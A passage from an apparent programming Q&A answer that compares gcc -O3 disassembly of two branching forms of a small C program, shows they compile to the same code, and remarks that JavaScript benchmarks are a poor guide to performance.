40055b: 74 0c je 400569 <main+0x29>
40055d: bf 6b 06 40 00 mov $0x40066b,%edi
400562: 31 c0 xor %eax,%eax
400564: e8 af fe ff ff callq 400418 <printf@plt>
400569: 31 c0 xor %eax,%eax
40056b: 48 83 c4 18 add $0x18,%rsp
40056f: c3 retq
And for gcc -O3 branch.c
0000000000400540 <main>:
400540: 48 83 ec 18 sub $0x18,%rsp
400544: 31 c0 xor %eax,%eax
400546: bf 68 06 40 00 mov $0x400668,%edi
40054b: 48 8d 74 24 0c lea 0xc(%rsp),%rsi
400550: e8 e3 fe ff ff callq 400438 <__isoc99_scanf@plt>
400555: 8b 44 24 0c mov 0xc(%rsp),%eax
400559: 85 c0 test %eax,%eax
40055b: 74 0c je 400569 <main+0x29>
40055d: bf 6b 06 40 00 mov $0x40066b,%edi
400562: 31 c0 xor %eax,%eax
400564: e8 af fe ff ff callq 400418 <printf@plt>
400569: 31 c0 xor %eax,%eax
40056b: 48 83 c4 18 add $0x18,%rsp
40056f: c3 retq
This is exactly the same code.
The question you linked to measures performance for JavaScript. Note that there the two forms may be translated (since JavaScript is interpreted or JIT-compiled depending on the engine) into something different.
Anyway, JavaScript is not the best place to learn about performance.
